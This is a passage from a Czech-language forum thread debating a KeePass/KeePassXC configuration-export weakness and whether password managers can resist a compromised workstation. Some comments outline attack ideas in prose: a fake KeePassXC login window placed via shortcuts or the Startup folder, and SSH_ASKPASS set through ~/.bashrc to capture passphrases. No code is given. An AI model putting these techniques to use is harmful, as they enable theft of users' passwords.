    Vy si domyslite hromadu veci a pak vedete tyhle nesmyslne sahodlouhe diskuze, bez relevance k tomu co opravdu bylo napsano a vyjadreno.
    Já jsem nezačal psát o lajcích, kolik dalších lidí tu diskusi čte apod. Na komentáře bez relevance k tomu, co bylo opravdu napsáno, jste tu expert vy.

    Ale pochopil jsem, že vám nejde o obsah diskuse, ale jenom o to mít poslední slovo – takže věci, které už jsem vyvrátil, opakujete znovu schválně, abyste diskusi točil pořád dokola. Říká se tomu trollení. Tak si to užijte, ale beze mne.

  • 13. 2. 2023 11:29

    Ctrl+P

    Nepřipadá vám zvláštní, že když jsem popsal různé varianty, co může útočník udělat, vy si vyberete jednu variantu, tu rozporujete – a ostatí jako by neexistovaly?
    Mohl byste mi prosím připomenout ty jiné varianty, protože jsem zachytila pouze změnu binárky. Zajímalo by mě, jak konkrétně podle vás lze z KeePassXC dostat nezašifrovaná hesla bez podstrčení falešné binárky. Mimochodem to, že si myslím, že zfalšovat binárku je pro BFU složité není dáno tím, že bych byla nějak zmanipulovaná, ale že jsem s BFU dennodenně ve styku a proto si myslím, že znám jejich reálné schopnosti včetně toho, že by netušili bez dalšího vysvětlení, co to ta binárka vůbec je...

    13. 2. 2023, 11:29 editováno autorem komentáře

  • 13. 2. 2023 11:43

    Filip Jirsák
    Stříbrný podporovatel

    Ctrl+P: Není potřeba měnit původní binárku, je možné nahrát jinou aplikaci do umístění, kam má uživatel právo zápisu. A přesměrovat na ni odkazy v menu Start, na ploše apod. Jediný problém by mohl nastat, pokud by tyto odkazy byly ve sdílené složce (All Users). Nevím, kam to standardně instaluje KeePassXC a jak se chovají Windows, pokud mají stejně pojmenovnaý soubor v obou umístěních (All Users i složka uživatele).

    No a pokud jde o binárku nebo skript – binárka je lepší, protože bude méně nápadná. Ale varianta, že se zobrazí okno imitující přihlašovací okno KeePassXC, pak se zobrazí chybová zpráva, že bylo heslo zadáno špatně, a pak se nastartuje reálný KeePassXC, je možné udělat i pomocí různých skriptovacích jazyků. Je tam větší riziko prozrazení, že si uživatel bude jistý, že heslo zadal správně a nový start aplikace v něm vzbudí podezření – ale většině uživatelů to pravděpodobně divné nepřijde.

    A co se týče vytvoření té falešné aplikace – tu samozřejmě nemusí vytvářet přímo útočník, stačí, když ji vytvoří někdo jiný a útočník ji jenom stáhne a použije. Stejně jako útočník nemusí být ten, kdo přišel na tu možnost exportu z KeePassu, ale může to být kdokoli, kdo si na internetu přečte návod, co má změnit. Nebo si rovnou stáhne skript, který změní konfigurační soubor nebo nainstaluje podvrženou aplikaci.

    Každopádně pořád bude pro útočníka nejsložitější to, jak získat přístup k zápisu do domovského adresáře uživatele.

  • 13. 2. 2023 11:57

    Ctrl+P

    Například odkaz na ploše aplikace KeePassXC je ve Windows v C:\Users\Public\Des­ktop a pokud se nemýlím, tak pro editaci v tomto umístění musí mít uživatel admin práva. Dobrá souhlasím s vámi, že tato možnost reálná je, ale stejně mi přijde daleko složitější než ta se změnou konfiguráku, protože tam stačí záškodníkovi najít, jak to podvrhnout (případně si stáhne ten jeden skript) a podvrhne jeden soubor, na což mu myslím stačí právo na zápis běžného uživatele, kdežto v případě podvržené aplikace - musí sehnat podvrženou aplikaci + upravit všechny soubory, které odkazují na tu správnou a mít na to patřičná práva.

    13. 2. 2023, 11:58 editováno autorem komentáře

  • 13. 2. 2023 12:58

    Filip Jirsák
    Stříbrný podporovatel

    Ctrl+P: Ano, potřeba administrátorských práv pro složku Public je další drobná překážka – vytvoření druhé ikony na ploše by bylo podezřelé a uživatel nejspíš automaticky použije tu, na kterou je zvyklý. Dá se to obejít např. přidáním přímo do složky Po spuštění (a uživatel ještě bude rád, že mu aplikace startuje automaticky a nemusí ji spouštět ručně). Nebo, pokud se bude jednat o případ, kdy uživatel odešel od počítače bez uzamknutí, bude stačit, když útočník odklepne UAC (jestli se nemýlím, většinou je nakonfigurovnaé tak, že nevyžaduje znovuzadání hesla).

    Každopádně to podvržení aplikace nemusí dělat útočník ručně, může to dělat záškodnický program/skript, který si dotyčný stáhne – stejně jako by si stáhl program/skript pro změnu toho konfiguračního souboru. A pokud někdo nezvládne stáhnout takovýhle program, nejspíš nezvládne ani oeditovat konfigurační XML soubor – skončí na tom, že se mu otevře v Edge, kde bude jen pro čtení.

    Souhlasím s tím, že technicky je o něco složitější dostat tam podvrženou aplikaci. Nicméně nejsložitější je získat ta práva zápisu. A pokud je někdo získá „omylem“, je prakticky jedno, jak je to technicky složité, protože v obou dvou případech stejně bude potřebovat hotový nástroj, který jenom spustí.

    Každopádně je potřeba se bránit proti tomu získání oprávnění zapisovat do domovské lsožky uživatele. Když tomuhle zabráníte (což není zas tak komplikované), je tím vyřešen i ten problém s přepisem konfiguračního souboru. A o to celou dobu jde – že nemá smysl řešit jeden dílčí problém s přepisem konfiguračního souboru kvůli velmi specifickému případu, kdy by někdo věděl o tomhle chování, měl možnost ho zneužít, dokázal ho zneužít a zároveň by nedokázal spáchat nic jiného, závažnějšího.

  • 13. 2. 2023 14:31

    K>

    Jirsak:
    Dnes 10:20: "Ale pochopil jsem, že vám nejde o obsah diskuse, ale jenom o to mít poslední slovo "
    Uz 9.2. 8:23 jsem jasne napsal, ze chci zkusit jestli je mozne s vami mit posledni slovo. Jestli vam to trvalo pochopit 4 dny, tak to znamena ze dneska teprve chapete o cem se tu psalo 4 dny zpatky? To by vysvetlovalo hodne veci.

    Dnes 10:20 odmitate uznat ze podvrhnout binarku je slozitejsi.
    Dnes 12:58 "Souhlasím s tím, že technicky je o něco složitější dostat tam podvrženou aplikaci. "
    Juuu, tohle jsem jeste nezazil. Ze byste zmenil nazor? Anebo si to opet jen spatne vykladam? Nebo konecne prislo pochopeni neceho 4 dny zpatky?

    Vy dnes 10:20: Ja: "znovu opakuji, vetsina lidi nema ani poneti, kde by mohli stahnout malware."
    Vy: "Co si slibujete od znovuopakování věci, která už byla vyvrácena?"
    No pockat. A kde si teda BFUcka stahnou ten malware? Jak jste psal 10. 2. 2023 12:52: "Útočník nemusí žádnou binárku kompilovat – to udělá jeden člověk, který tomu rozumí, ostatní ji jenom použijí." - kde teda BFUcka vezmou tu binarku zkompilovanou jednim hypotetickym clovekem? At hledam jak hledam, v diskuznim vlakne to nikde nenachazim.

    Vy dnes 12:58: "pokud někdo nezvládne stáhnout takovýhle program, nejspíš nezvládne ani oeditovat konfigurační XML soubor "
    1, porad nevime odkud by BFU stahnul upravenou binarku
    2, jak jsem jiz psal jiz 10.2.:
    "kdyz ja se podivam kolem sebe, tak vidim 2 lidi co umi zkompliovat binarku, a 20 lidi co to neumi (ale umi upravit textak)."
    Zkusim pockat 4 dny, treba vam to docvakne (pro jistotu - XML soubor zarazuji do kategorie "textak").

  • 6. 2. 2023 9:52

    Danny
    Stříbrný podporovatel

    Ale to realne hrozi u kazdeho password manageru. Pokud nemate vyresenou bezpecnost stanice, kde ten password manager pouzivate, pak nepomuze ani svecena voda. Aneb zkuste zabezpecit password manager proti keyloggeru. Dobre, muzete k databazi pouzit u2f token, pouzivate ho? Ale ani to nezabrani tomu, ze heslo vam na kompromitovane stanici utece v momente, kdy v password manageru ulozene heslo nekde pouzijete.

  • 6. 2. 2023 13:06

    JVr

    Nechali jsme lidi používat hesla, jenže ti zmetci pořád vymýšlí to samé jako „heslo“, „123456“, „qwerty“… Co s tím? Dali jsme jim pravidla jak mají hesla vypadat -> kombinace čísel, písmen a dalších znaků povinně!

    Teď si zas ta hesla nepomatují, zapomínají je a volají pořád na helpdesk s žádostmi o reset hesla. Někteří vymysleli jak ta pravidla obcházet a dělají hesla jako „Heslo123“, „Qwertz123“ a ke všemu si to píšou na lístečky, tabule do notýsků … Co s tím? Dáme jim password managery, ty za ně vymyslí náhodná hesla a budou si to i pomatovat za ně!

    Njn, ale co když někdo prolomí ta hesla uložená v password manageru? No to by se nemělo s stát! Ale co když? Co s tím? Víte co, na lidi jsou ta hesla moc, co je zrušit? -> „Passwordless authentication“

    Kdo doplní story dál? Myslím že to půjde tak v 5-> 10 leté iteraci dál…

  • 6. 2. 2023 15:40

    Danny
    Stříbrný podporovatel

    Tak znovu a strucneji. Password manager neni neprustrelne ochranitelny pred kompromitaci pracovni stanice. S tim co pisete to nic spolecneho nema.

  • 6. 2. 2023 13:05

    Pavel Tavoda

    Tak ako vam uz napisali hore, nema to zmysel riesit je to len dalsie posuvanie hranice (security by obscurity). Ak to chcete naozaj riesit treba pouzit nejaky HW token z ktoreho sa ten kluc neda dostat.

  • 6. 2. 2023 15:21

    Filip Jirsák
    Stříbrný podporovatel

    Pletl jste se v něčem jiném. Tady nejde o to, že útočníci mají jenom přístup k databázi – proti tomu je KeePass odolný. Tady se ale řeší daleko vážnější bezpečnostní problém – útočník má práva uživatele pro zápis do souborového systému pod uživatelem, který následně spouští aplikaci pro správu hesel a zadává do té aplikace heslo.

    Myslíte, že třeba autoři ssh jsou diletanti? Přitom to má úplně stejnou „bezpečnostní chybu“ – když spustíte útočníkem podvržené ssh, zadáte heslo ke klíči (nebo k cílovému systému) do útočníkem podvržené aplikace, která ho může vyexportovat do souboru na disk.

  • 7. 2. 2023 19:36

    dw

    Tak binarky ssh ani nie je treba podvrhnut, viz manual a env premenna SSH_ASKPASS, staci moznost zapisat do ~/.bashrc (alebo obdoba pre iny shell ako bash)

    7. 2. 2023, 19:38 editováno autorem komentáře